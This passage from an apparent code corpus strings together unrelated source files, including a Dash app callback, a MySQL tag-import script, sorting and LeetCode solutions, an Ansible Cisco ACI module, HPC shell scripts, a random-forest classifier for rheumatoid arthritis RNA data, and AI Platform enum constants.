    raised NameError. The guard now uses only ``n_clicks``. Both words are
    also stripped before being embedded in the API URL, matching the other
    callbacks (the original stripped into an unused local instead).
    """
    if n_clicks:
        sw_1 = sw_1.strip()
        sw_2 = sw_2.strip()
        if switch_value:
            switch_value = 1
        else:
            switch_value = 0
        site = "all"
        today = datetime.today().strftime("%Y-%m-%d")
        from_date = (datetime.today() -
                     timedelta(days=MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
        api_url = (f"http://pressgraphs.pythonanywhere.com/date/count/"
                   f"{API_KEY}/{sw_1}/{switch_value}/{from_date}/{today}/{site}")
        response = requests.get(api_url)
        content_1 = response.json()[1]["data"]
        df_1 = pd.DataFrame(content_1)
        df_1.set_index("date", inplace=True)
        api_url = (f"http://pressgraphs.pythonanywhere.com/date/count/"
                   f"{API_KEY}/{sw_2}/{switch_value}/{from_date}/{today}/{site}")
        response = requests.get(api_url)
        content_2 = response.json()[1]["data"]
        df_2 = pd.DataFrame(content_2)
        df_2.set_index("date", inplace=True)
    else:
        # Initial fire: empty inputs make the plot helper return px.bar().
        df_1 = pd.DataFrame()
        df_2 = pd.DataFrame()
        sw_1 = ""
        sw_2 = ""
    fig = compare_two_search_words(sw_df_1=df_1,
                                   sw_df_2=df_2,
                                   search_word_1=sw_1,
                                   search_word_2=sw_2)
    return fig
###################################
# PAGE 5 DATA TABLE CALLBACK
###################################
@app.callback(
    Output('table5', 'children'),
    [Input('graph_5', 'clickData'),
     Input('switch-input', 'value')],
    [State('search_input_1', 'value'),
     State('search_input_2', 'value')])
def display_clickData_5(clickData, switch_value, sw_1, sw_2):
    """
    List the articles behind a clicked point; which word is queried depends
    on which of the two traces was clicked (curveNumber 0 -> first word).
    """
    if clickData:
        sw_1 = sw_1.strip()
        sw_2 = sw_2.strip()
        date = list(clickData["points"])[0]["x"]
        site="all"
        if switch_value:
            switch_value = 1
        else:
            switch_value = 0
        # Trace index identifies whether word 1 or word 2 was clicked.
        sw_indicator = clickData["points"][0]['curveNumber']
        if sw_indicator == 0:
            api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
                f"{API_KEY}/{sw_1}/{switch_value}/{date}/{date}/{site}"
        else:
            api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
                f"{API_KEY}/{sw_2}/{switch_value}/{date}/{date}/{site}"
        response = requests.get(api_url)
        content = response.json()[1]["data"]
        df = pd.DataFrame(content)
        return update_dt_by_date(df)
    else:
        return
###################################
# CONTACT
###################################
page_6_layout = html.Div([
    html.H4("Elérhetőség"),
    dcc.Markdown(children=md_txt.contact)])
###################################
# MANUAL
###################################
page_7_layout = html.Div([
    html.H4("Használati útmutató"),
    dcc.Markdown(children=md_txt.manual)])
###################################
# SITE LIST
###################################
page_8_layout = html.Div([
    html.H4("Monitorozott oldalak listája"),
    dcc.Markdown(children=md_txt.modus_operandi)])
###################################
# RUN APP SERVER
###################################
# Debug server for local development; production serves the `server`
# WSGI object defined above.
if __name__ == '__main__':
    app.run_server(debug=True, port=8050)
    #app.run_server()
| 28,956 | 9,663 |
import pickle as pk
import pymysql as mysql
from tqdm import tqdm
host, login, password, db, file_name = input('Enter host, login, password, database name and file name:\n').split()

# The pickle holds an {appid: [tag, ...]} mapping produced by an earlier step.
with open(file_name, 'rb') as f:
    data = pk.load(f)

# PyMySQL deprecated positional connect() arguments -- use keywords.
connection = mysql.connect(host=host, user=login, password=password, database=db)
try:
    with connection.cursor() as cur:
        # Line below for some reasons do not work, but u have to use same SQL-query in MySQL/MariaDB cmd and it works
        #cur.execute('DROP TABLE games_tags;CREATE TABLE games_tags(appid INTEGER NOT NULL UNIQUE, tags VARCHAR(1024) NOT NULL) ENGINE InnoDB;')
        for key in tqdm(data.keys()):
            # Parameterized query: the driver escapes quotes itself, so tag
            # names keep their apostrophes and SQL injection is impossible
            # (the old %-formatting interpolated raw strings and stripped
            # every quote character as a workaround).
            cur.execute('INSERT INTO games_tags VALUES (%s, %s);',
                        (key, ', '.join(data[key])))
    connection.commit()
finally:
    # Close the connection even if an insert fails part-way through.
    connection.close()
| 802 | 259 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date : Jul-13-19 18:02
# @Author : Your Name (you@example.org)
# @Link : http://example.org
import os
import random
import pysnooper
import time
import csv
from quicksort import quicksort
def bubblesort(l: list):
    """Sort *l* in place by pairwise exchanges and return the same list.

    (Despite the name this is a selection-style exchange sort; the end
    result is identical: *l* ends up in ascending order.)
    """
    n = len(l)
    for left in range(n):
        for right in range(left + 1, n):
            if l[right] < l[left]:
                l[left], l[right] = l[right], l[left]
    return l
def main():
    """
    Time quicksort (or bubblesort) on random integer lists of growing
    size and append the measurements to a CSV file.

    bubblesort的时间复杂度是O(n^2)
    quicksort的时间复杂度是O(nlogn)
    """
    # csv_path = "./bubblesort.csv"
    csv_path = "./quicksort.csv"
    nsample = 1
    N = list(range(10, 10000, 10))
    for n in N:
        avg_elapsed = 0
        for _ in range(nsample):
            l = [random.randint(0, 10000) for _ in range(n)]
            # BUG FIX: time.clock() was removed in Python 3.8;
            # perf_counter() is the recommended monotonic benchmark timer.
            start = time.perf_counter()
            # bubblesort(l)
            quicksort(l)
            avg_elapsed += time.perf_counter() - start
        avg_elapsed /= nsample
        print("n:", n)
        print("Average time used:", avg_elapsed)
        # BUG FIX: the original open()ed the CSV on every iteration and
        # never closed it; "with" guarantees the handle is released.
        # newline="" is the csv-module-correct open mode.
        write_header = not os.path.exists(csv_path)
        with open(csv_path, "a", newline="") as f:
            f_csv = csv.writer(f)
            if write_header:
                f_csv.writerow(["N", "avg_elapsed"])
            f_csv.writerow((n, avg_elapsed))


if __name__ == "__main__":
    main()
| 1,467 | 576 |
class SessionBase(object):
    """
    Base class for accessing plan, state, and context data.

    Is responsible for defining initial state, context, and action in __init__.
    ALL METHODS MUST BE OVERRIDDEN.
    """
    # NOTE: the "overriden" typo in every NotImplementedError message has
    # been corrected to "overridden".

    @property
    def plan(self):
        """The active plan for the session."""
        raise NotImplementedError("must be overridden")

    @property
    def configuration(self):
        """The active configuration provider for the session."""
        raise NotImplementedError("must be overridden")

    @property
    def current_node(self):
        """
        Gets the current node in the plan that the agent is at.

        :return: The current node in the plan
        """
        raise NotImplementedError("must be overridden")

    @property
    def current_state(self):
        """
        Gets currently processed state.

        :return: The processed state
        """
        raise NotImplementedError("must be overridden")

    @property
    def current_action(self):
        """
        Gets next action to be executed.

        :return: The action
        """
        raise NotImplementedError("must be overridden")

    def update_by(self, progress):
        """
        Updates session to state and context described by the given progress.
        Action for given state is created. (Available through current_action property)

        :param progress: State to be set
        """
        raise NotImplementedError("must be overridden")

    def get_context_copy(self):
        """
        Gets copy of currently processed context.

        :return: The processed context copy
        """
        raise NotImplementedError("must be overridden")
| 1,667 | 422 |
'''
Description:
Author: Kotori Y
Date: 2021-04-22 09:14:19
LastEditors: Kotori Y
LastEditTime: 2021-04-22 09:14:20
FilePath: \LeetCode-Code\codes\Others\Longest-Palindromic-Substring\script.py
AuthorMail: kotori@cbdd.me
'''
class Solution:
    def boo(self, s, left, right):
        """Expand around the center (left, right) and return the
        inclusive bounds [lo, hi] of the widest palindrome found there."""
        while left >= 0 and right < len(s) and s[left] == s[right]:
            left -= 1
            right += 1
        return [left + 1, right - 1]

    def longestPalindrome(self, s: str) -> str:
        """Return the longest palindromic substring of *s* (the first one
        encountered when scanning centers left to right)."""
        best_lo, best_hi = 0, 0
        for center in range(len(s)):
            # Odd-length center first, then even-length, exactly as the
            # strict ">" comparison requires for identical tie-breaking.
            for lo, hi in (self.boo(s, center, center),
                           self.boo(s, center, center + 1)):
                if hi - lo > best_hi - best_lo:
                    best_lo, best_hi = lo, hi
        return s[best_lo: best_hi + 1]
#!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_fabric_spine_switch_assoc
short_description: Manage spine switch bindings to profiles and policy groups (fabric:SpineS and fabric:RsSpNodePGrp).
description:
- Manage fabric spine switch associations (fabric:SpineS) to an existing fabric
spine profile (fabric:SpineP) in an ACI fabric, and bind them to a
policy group (fabric:RsSpNodePGrp)
options:
profile:
description:
- Name of an existing fabric spine switch profile
type: str
aliases: [ spine_profile, spine_switch_profile ]
name:
description:
- Name of the switch association
type: str
aliases: [ association_name, switch_association ]
policy_group:
description:
- Name of an existing spine switch policy group
type: str
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment:
- cisco.aci.aci
notes:
- The C(profile) must exist before using this module in your playbook.
The M(cisco.aci.aci_fabric_spine_profile) module can be used for this.
seealso:
- name: APIC Management Information Model reference
description: More information about the internal APIC classes B(fabricSpineS) and B(fabricRsSpNodePGrp).
link: https://developer.cisco.com/docs/apic-mim-ref/
author:
- Tim Cragg (@timcragg)
'''
EXAMPLES = r'''
- name: Create a spine switch profile association
cisco.aci.aci_fabric_spine_switch_assoc:
host: apic
username: admin
password: SomeSecretPassword
profile: my_spine_profile
name: my_spine_switch_assoc
policy_group: my_spine_pol_grp
state: present
delegate_to: localhost
- name: Remove a spine switch profile association
cisco.aci.aci_fabric_spine_switch_assoc:
host: apic
username: admin
password: SomeSecretPassword
profile: my_spine_profile
name: my_spine_switch_assoc
state: absent
delegate_to: localhost
- name: Query a spine profile association
cisco.aci.aci_fabric_spine_switch_assoc:
host: apic
username: admin
password: SomeSecretPassword
profile: my_spine_profile
name: my_spine_switch_assoc
state: query
delegate_to: localhost
register: query_result
- name: Query all spine profiles
cisco.aci.aci_fabric_spine_switch_assoc:
host: apic
username: admin
password: SomeSecretPassword
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: str
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: str
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: str
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: str
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: str
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible_collections.cisco.aci.plugins.module_utils.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
def main():
    """Ansible entry point: build the module spec, construct the APIC
    request for the fabricSpineS object and apply the requested state."""
    argument_spec = aci_argument_spec()
    argument_spec.update(
        profile=dict(type='str', aliases=['spine_profile', 'spine_switch_profile']),
        name=dict(type='str', aliases=['association_name', 'switch_association']),
        policy_group=dict(type='str'),
        state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
    )

    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        # Both create and delete must address a concrete association.
        required_if=[
            ['state', 'absent', ['profile', 'name']],
            ['state', 'present', ['profile', 'name']],
        ],
    )

    aci = ACIModule(module)

    params = module.params
    profile = params.get('profile')
    name = params.get('name')
    policy_group = params.get('policy_group')
    state = params.get('state')

    aci.construct_url(
        root_class=dict(
            aci_class='fabricSpineP',
            aci_rn='fabric/spprof-{0}'.format(profile),
            module_object=profile,
            target_filter={'name': profile},
        ),
        subclass_1=dict(
            aci_class='fabricSpineS',
            aci_rn='spines-{0}-typ-range'.format(name),
            module_object=name,
            target_filter={'name': name},
        ),
        child_classes=['fabricRsSpNodePGrp', 'fabricNodeBlk'],
    )

    aci.get_existing()

    if state == 'present':
        # Bind the association to a policy group only when one was given.
        child_configs = []
        if policy_group:
            child_configs.append(dict(
                fabricRsSpNodePGrp=dict(
                    attributes=dict(
                        tDn='uni/fabric/funcprof/spnodepgrp-{0}'.format(policy_group),
                    ),
                ),
            ))
        aci.payload(
            aci_class='fabricSpineS',
            class_config=dict(name=name),
            child_configs=child_configs,
        )
        aci.get_diff(aci_class='fabricSpineS')
        aci.post_config()
    elif state == 'absent':
        aci.delete_config()

    aci.exit_json()


if __name__ == "__main__":
    main()
| 8,044 | 2,424 |
# Paths for the EM analysis scripts and the dataset under study.
scriptdir="$HOME/workspace/EM"
DATA="$HOME/oxdata"
datadir="$DATA/P01/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
# Inspect the pre-rendered stack+mesh state in ParaView.
paraview --state=$datadir/m000_01000-01500_01000-01500_00200-00300/stack+mesh_compact.pvsm
# Generate a SLURM batch script that converts the m000 HDF5 stack with
# EM_stack2stack.py (-i/-l: axis order zyx -> xyz; -e: element sizes;
# -u presumably a unit/update flag of that script), then submit it.
qsubfile=$datadir/EM_con2.sh
echo '#!/bin/bash' > $qsubfile
echo "#SBATCH --nodes=1" >> $qsubfile
echo "#SBATCH --ntasks-per-node=1" >> $qsubfile
echo "#SBATCH --time=01:00:00" >> $qsubfile
echo "#SBATCH --job-name=EM_con" >> $qsubfile
echo "python $scriptdir/convert/EM_stack2stack.py \
${datadir}/m000.h5 ${datadir}/m000.h5 \
-i 'zyx' -l 'xyz' -e -0.0073 -0.0073 0.05 -u" >> $qsubfile
sbatch $qsubfile
# Locally convert four 1000x1000 sub-blocks (z range 30..460) of the
# dataset to NIfTI and decompress each result.
scriptdir="$HOME/workspace/EM"
DATA="$HOME/oxdata"
datadir="$DATA/P01/EM/M3/M3_S1_GNU" && cd $datadir
dataset='m000'
pf=''
xs=1000; ys=1000;
z=30; Z=460;
for x in 2000 3000; do
    for y in 2000 3000; do
        X=$((x+xs))
        Y=$((y+ys))
        # Filename stem encodes the zero-padded x/y/z crop ranges.
        datastem=${dataset}_`printf %05d ${x}`-`printf %05d ${X}`_`printf %05d ${y}`-`printf %05d ${Y}`_`printf %05d ${z}`-`printf %05d ${Z}`
        python $scriptdir/convert/EM_stack2stack.py \
        ${datadir}/${datastem}${pf}.h5 ${datadir}/${datastem}${pf}.nii.gz \
        -i 'zyx' -l 'xyz' -e -0.0073 -0.0073 0.05 -u
        gunzip ${datadir}/${datastem}${pf}.nii.gz
    done
done
| 1,185 | 636 |
#!/usr/bin/env python
# coding: utf-8
# In[5]:
import pandas as pd
import numpy as np
import glob,os
from glob import iglob
#import scanpy as sc
from sklearn.svm import SVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import RocCurveDisplay
from sklearn.datasets import load_wine
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import roc_auc_score
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn import metrics
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
import joblib
import time
import random
import matplotlib as mpl
mpl.rcParams['pdf.fonttype']=42
mpl.rcParams['ps.fonttype']=42
# # RA PBMC data for machine learning
# In[6]:
### training data import
# RA patient and healthy-donor expression matrices (genes as rows,
# samples as columns — they are transposed below).
ra=pd.read_csv('../RNA_seq_for_autoimmune_disease/RA_bulk/GSE90081/GSE90081_ra_part.csv',index_col=0)
hd=pd.read_csv('../RNA_seq_for_autoimmune_disease/RA_bulk/GSE90081/GSE90081_hd_part.csv',index_col=0)
hd1=pd.read_csv('../RNA_seq_for_autoimmune_disease/health_bulk/GSE183204_HC_fpkm.csv',sep=',',index_col=0)
# In[7]:
### feature import
# Gene list used as model features; 'patient' is appended as a feature
# name and the list is intersected with the genes present in both ra and
# hd1 (so 'patient' itself survives only if it appears in those indexes).
features=pd.read_csv('../script4paper2/combined_gene_for_machine_learning.csv',index_col=1).index.values
features=np.append(features,'patient')
features=[i for i in features if i in ra.index.values]
features=[i for i in features if i in hd1.index.values ]
# # remove unwanted gene
# In[8]:
### remove unwanted gene from validation data
# Restrict each matrix to the selected genes, then transpose to
# samples-by-genes orientation for sklearn.
hd1=hd1.loc[features,:].T
ra_part=ra.loc[features,:].T
hd_part=hd.loc[features,:].T
# # label data
# In[9]:
### label training data
# Binary target: 1 = RA patient, 0 = healthy control.
ra_part['patient']=1
hd_part['patient']=0
hd1['patient']=0
# # machine learning data training
# In[39]:
### merge training data
df=pd.concat([ra_part,hd_part,hd1],axis=0)
### get data labels
label=df.patient.values
### split data with ratio 30% for test and 70% for training
Xtrain, Xtest, Ytrain, Ytest = train_test_split(df.drop(columns=['patient']),label,test_size=0.3)
### rf model initialization
# class_weight='balanced' compensates for unequal patient/control counts;
# oob_score adds an out-of-bag generalization estimate.
rfc = RandomForestClassifier(random_state=43,class_weight='balanced',oob_score=True)
rfc = rfc.fit(Xtrain,Ytrain)
### document model score
score_r = rfc.score(Xtest,Ytest)
### save feature importance
ra_pbmc=pd.DataFrame(rfc.feature_importances_)
ra_pbmc['feature_importance']=features
ra_pbmc.to_csv('./model/ra_pbmc_feature_importance_bulk.csv')
### print F score and Out of bag score
# NOTE(review): score() reports mean accuracy, not an F score — the
# comment above is kept from the original; verify which metric was meant.
print("Random Forest:{}".format(score_r))
print("OOB score:",rfc.oob_score_)
# # Figure 7A
# In[40]:
### Generating ROC curve for the trained classifier on the held-out test set.
fig = plt.figure(figsize=(8, 8))
ax = plt.gca()
rfc_disp = RocCurveDisplay.from_estimator(rfc, Xtest, Ytest, ax=ax, alpha=0.8)
plt.legend(loc=4, prop={'size': 10})
plt.xlabel('False Positive Rate', fontsize=18)
plt.ylabel('True Positive Rate', fontsize=16)
ax.plot([0, 1], [0, 1], ls="--", c=".3")  # chance diagonal
mpl.rcParams['pdf.fonttype'] = 42  # keep fonts editable in the PDF
mpl.rcParams['ps.fonttype'] = 42
# BUG FIX: savefig() has no width/height parameters (modern Matplotlib
# rejects unknown keyword arguments); the size is set by figsize above.
plt.savefig('./figure6_and_7/7a_ra_pbmc_bulk_auc.pdf')
# # save/load best performance model
# In[24]:
### save the best performance model
#joblib.dump(rfc, './model/ra_synovial_bulk_best.model')
### load model
#rfc=joblib.load('./model/sle_best.model')
# In[19]:
### 10-fold cross validation
# Compute the CV scores once and reuse them: the original ran the full
# 10-fold cross-validation twice (once for the mean, once for the
# variance), doubling the runtime for identical output.
cv_scores = cross_val_score(rfc, df.drop(columns=['patient']), label, cv=10)
print(cv_scores.mean())
print(cv_scores.var())
# # Figure 7D
# In[42]:
### Bar plot of the saved random-forest feature importances.
ra_feature = pd.read_csv('./model/ra_pbmc_feature_importance_bulk.csv')
fig, ax = plt.subplots(figsize=(15, 5))
ax.bar(x=ra_feature['feature_importance'], height=ra_feature['0'])
ax.set_title("Feature importance for RA bulk RNA PBMC model", fontsize=15)
plt.xticks(rotation=90)
mpl.rcParams['pdf.fonttype'] = 42  # keep fonts editable in the PDF
mpl.rcParams['ps.fonttype'] = 42
# BUG FIX: width/height are not savefig() parameters (modern Matplotlib
# rejects unknown keyword arguments); the size comes from figsize above.
plt.savefig('./figure6_and_7/7d_ra_pbmc_bulk.pdf')
# # Hyper-parameter adjust
# In[795]:
# Coarse scan of n_estimators (1, 11, 21, ... 191 trees), scored by mean
# 10-fold cross-validation accuracy.
data=df.drop(columns=['patient'])
label=df.patient.values
start=time.time()
scorel = []
for i in range(0,200,10): # loop for 0-200 decision trees
    rfc = RandomForestClassifier(n_estimators=i+1,n_jobs=-1,random_state=0)
    score = cross_val_score(rfc,data,label,cv=10).mean()
    scorel.append(score)
# Best mean CV score and the tree count that produced it
# (index*10+1 maps the list position back to n_estimators).
print(max(scorel),(scorel.index(max(scorel))*10)+1)
end=time.time()
print('Running time: %s Seconds'%(end-start))
plt.figure(figsize=[20,5])
plt.plot(range(1,201,10),scorel)
plt.show()
# In[801]:
# Fine scan of n_estimators around the coarse optimum (186..205 trees).
scorel = []
for i in range(185,205):
    rfc = RandomForestClassifier(n_estimators=i+1,n_jobs=-1,random_state=0)
    score = cross_val_score(rfc,data,label,cv=10).mean()
    scorel.append(score)
# NOTE(review): n_estimators is i+1 but the reported/plotted x values come
# from range(185,205), so they are off by one from the tree count actually
# used — confirm before reading off the optimum.
print(max(scorel),([*range(185,205)][scorel.index(max(scorel))]))
plt.figure(figsize=[20,5])
plt.plot(range(185,205),scorel)
plt.show()
# In[802]:
# Grid-search max_depth (1..89, step 2) with n_estimators fixed at 190,
# scored by 10-fold cross-validation.
start=time.time()
param_grid = {'max_depth':np.arange(1, 90,2)}
alg = RandomForestClassifier(n_estimators=190,random_state=0)
GS = GridSearchCV(alg,param_grid,cv=10)
GS.fit(data,label)
print(GS.best_params_)
print(GS.best_score_)
end=time.time()
print('Running time: %s Seconds'%(end-start))
# In[803]:
# Grid-search max_features (5..79) with n_estimators fixed at 190.
start=time.time()
param_grid = {'max_features':np.arange(5,80,1)}
rfc = RandomForestClassifier(n_estimators=190,random_state=0)
GS = GridSearchCV(rfc,param_grid,cv=10)
GS.fit(data,label)
print(GS.best_params_)
print(GS.best_score_)
end=time.time()
print('Running time: %s Seconds'%(end-start))
# # 100 loop of 10-fold cross validation
# In[35]:
df_n = df.drop(columns=['patient'])
rfc_l = []   # per-fold ROC AUC scores
acc_l = []   # per-fold accuracy scores
# BUG FIX: the original reused one unshuffled StratifiedKFold with a fixed
# model random_state, so all 100 repetitions used identical folds and
# produced identical scores — the loop added no information. Re-shuffling
# with a different seed per repetition makes this a genuine repeated CV.
# (Also removed fpr_l/tpr_l, which were never used.)
for i in range(100):
    skf = StratifiedKFold(n_splits=10, shuffle=True, random_state=i)
    for train_index, test_index in skf.split(df_n, label):
        rfc = RandomForestClassifier(random_state=0, class_weight="balanced", oob_score=True)
        rfc = rfc.fit(df_n.iloc[train_index], label[train_index])
        rfc_l.append(roc_auc_score(label[test_index], rfc.predict_proba(df_n.iloc[test_index])[:, 1]))
        acc_l.append(accuracy_score(label[test_index], rfc.predict(df_n.iloc[test_index])))
# In[36]:
### average AUC and its standard deviation error
print(np.mean(rfc_l))
print(np.std(rfc_l))
| 6,319 | 2,644 |
import json
import pytest
from approvaltests import verify
from approvaltests.utils import get_adjacent_file
from statement import statement
def test_example_statement():
    """Golden-master check of statement() on the sample invoice."""
    with open(get_adjacent_file("invoice.json")) as fh:
        invoice = json.load(fh)
    with open(get_adjacent_file("plays.json")) as fh:
        plays = json.load(fh)
    verify(statement(invoice, plays))
def test_statement_with_new_play_types():
    """statement() must reject invoices referencing an unknown play type."""
    with open(get_adjacent_file("invoice_new_plays.json")) as fh:
        invoice = json.load(fh)
    with open(get_adjacent_file("new_plays.json")) as fh:
        plays = json.load(fh)
    # match= performs a substring (regex) search on the message, the same
    # check the original expressed with `in`.
    with pytest.raises(ValueError, match="unknown type"):
        statement(invoice, plays)
| 782 | 249 |
def require(arg_name, *allowed_types):
    """Decorator factory (Python 2): runtime type-check one argument.

    Wraps a function so every call verifies that ``arg_name`` — whether
    passed positionally or by keyword — is an instance of one of
    ``allowed_types``, raising TypeError otherwise.
    """
    def make_wrapper(f):
        # Reuse the argument-name list cached by an inner @require so
        # stacked decorators still inspect the original signature.
        if hasattr(f, "wrapped_args"):
            wrapped_args = getattr(f, "wrapped_args")
        else:
            code = f.func_code
            wrapped_args = list(code.co_varnames[:code.co_argcount])
        try:
            arg_index = wrapped_args.index(arg_name)
        except ValueError:
            # Decorating a function that has no such argument is a
            # programming error, reported at decoration time.
            raise NameError, arg_name
        def wrapper(*args, **kwargs):
            # Argument supplied positionally?
            if len(args) > arg_index:
                arg = args[arg_index]
                if not isinstance(arg, allowed_types):
                    type_list = " or ".join(str(allowed_type) for allowed_type in allowed_types)
                    raise TypeError, "Expected '%s' to be %s; was %s." % (arg_name, type_list, type(arg))
            else:
                # Otherwise look it up among the keyword arguments
                # (an omitted optional argument is not checked at all).
                if arg_name in kwargs:
                    arg = kwargs[arg_name]
                    if not isinstance(arg, allowed_types):
                        type_list = " or ".join(str(allowed_type) for allowed_type in allowed_types)
                        raise TypeError, "Expected '%s' to be %s; was %s." % (arg_name, type_list, type(arg))
            return f(*args, **kwargs)
        wrapper.wrapped_args = wrapped_args
        return wrapper
    return make_wrapper
# Example usage: x may be an int or float, y must be a float.
@require("x", int, float)
@require("y", float)
def foo(x, y):
    return x+y

print foo(1, 2.5)      # Prints 3.5.
print foo(2.0, 2.5)    # Prints 4.5.
print foo("asdf", 2.5) # Raises TypeError exception.
print foo(1, 2)        # Raises TypeError exception.
| 1,537 | 486 |
# AUTOGENERATED! DO NOT EDIT! File to edit: ai_platform_constants.ipynb (unless otherwise specified).
__all__ = ['AcceleratorType', 'ScaleTier', 'MachineType', 'DistributionStrategyType']
# Cell
from enum import Enum

# https://cloud.google.com/sdk/gcloud/reference/ai-platform/jobs/submit/training#--master-accelerator
class AcceleratorType(Enum):
    """GPU/TPU accelerator identifiers accepted by AI Platform training."""
    NVIDIA_TESLA_K80 = 'nvidia-tesla-k80'
    NVIDIA_TESLA_P100 = 'nvidia-tesla-p100'
    NVIDIA_TESLA_V100 = 'nvidia-tesla-v100'
    NVIDIA_TESLA_P4 = 'nvidia-tesla-p4'
    NVIDIA_TESLA_T4 = 'nvidia-tesla-t4'
    TPU_V2 = 'tpu-v2'
    TPU_V2_POD = 'tpu-v2-pod'
    TPU_V3 = 'tpu-v3'
    TPU_V3_POD = 'tpu-v3-pod'
# Cell
# https://cloud.google.com/sdk/gcloud/reference/ai-platform/jobs/submit/training#--master-machine-type
class ScaleTier(Enum):
    """Cluster scale tiers for AI Platform training jobs.

    The member descriptions below were bare string literals in the
    original source; bare strings after an assignment are no-op
    statements (and the first one silently became the class docstring),
    so they have been converted to comments. A stray trailing semicolon
    on STANDARD_1 was also removed.
    """

    # Single worker instance. Suitable for learning how to use AI
    # Platform, and for experimenting with new models using small datasets.
    BASIC = 'basic'
    # Single worker instance with a GPU.
    BASIC_GPU = 'basic-gpu'
    # Single worker instance with a Cloud TPU.
    BASIC_TPU = 'basic-tpu'
    # Not a set tier: enables a custom cluster specification, configured
    # according to the AI Platform guidelines.
    CUSTOM = 'custom'
    # Many workers and a few parameter servers.
    STANDARD_1 = 'standard-1'
    # A large number of workers with many parameter servers.
    PREMIUM_1 = 'premium-1'
# Cell
# https://cloud.google.com/compute/docs/machine-types
class MachineType(Enum):
    """Compute Engine machine-type identifiers (n1 families)."""
    # n1-standard family
    N1_STANDARD_4 = 'n1-standard-4'
    N1_STANDARD_8 = 'n1-standard-8'
    N1_STANDARD_16 = 'n1-standard-16'
    N1_STANDARD_32 = 'n1-standard-32'
    N1_STANDARD_64 = 'n1-standard-64'
    N1_STANDARD_96 = 'n1-standard-96'
    # n1-highmem family
    N1_HIGHMEM_2 = 'n1-highmem-2'
    N1_HIGHMEM_4 = 'n1-highmem-4'
    N1_HIGHMEM_8 = 'n1-highmem-8'
    N1_HIGHMEM_16 = 'n1-highmem-16'
    N1_HIGHMEM_32 = 'n1-highmem-32'
    N1_HIGHMEM_64 = 'n1-highmem-64'
    N1_HIGHMEM_96 = 'n1-highmem-96'
    # n1-highcpu family
    N1_HIGHCPU_16 = 'n1-highcpu-16'
    N1_HIGHCPU_32 = 'n1-highcpu-32'
    N1_HIGHCPU_64 = 'n1-highcpu-64'
    N1_HIGHCPU_96 = 'n1-highcpu-96'
# Cell
class DistributionStrategyType(Enum):
    """Fully qualified names of tf.distribute strategy classes.

    str(member) returns the dotted strategy path so members can be
    interpolated directly into command lines and config strings.
    """

    def __str__(self):
        return str(self.value)

    MIRRORED_STRATEGY = "tf.distribute.MirroredStrategy"
    ONE_DEVICE_STRATEGY = "tf.distribute.OneDeviceStrategy"
    CENTRAL_STORAGE_STRATEGY = "tf.distribute.experimental.CentralStorageStrategy"
    PARAMETER_SERVERSTRATEGY = "tf.distribute.experimental.ParameterServerStrategy"
    # Correctly spelled alias for the typo'd PARAMETER_SERVERSTRATEGY
    # above; equal values make Enum treat this as an alias of the same
    # member, so existing callers keep working.
    PARAMETER_SERVER_STRATEGY = "tf.distribute.experimental.ParameterServerStrategy"
    MULTI_WORKER_MIRRORED_STRATEGY = "tf.distribute.experimental.MultiWorkerMirroredStrategy"
    TPU_STRATEGY = "tf.distribute.experimental.TPUStrategy"
| 2,914 | 1,201 |
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# Install using pip install pystan
# It requires a C/C++ compiler
import pystan
# Set random seed for reproducibility
np.random.seed(1000)

# Number of observations
nb_samples = 10

if __name__ == "__main__":
    # Create the observations: synthetic journey data in which the
    # arrival time is a noisy sum of departure delay, travel time and
    # arrival delay.
    departure_delay = np.random.exponential(0.5, size=nb_samples)
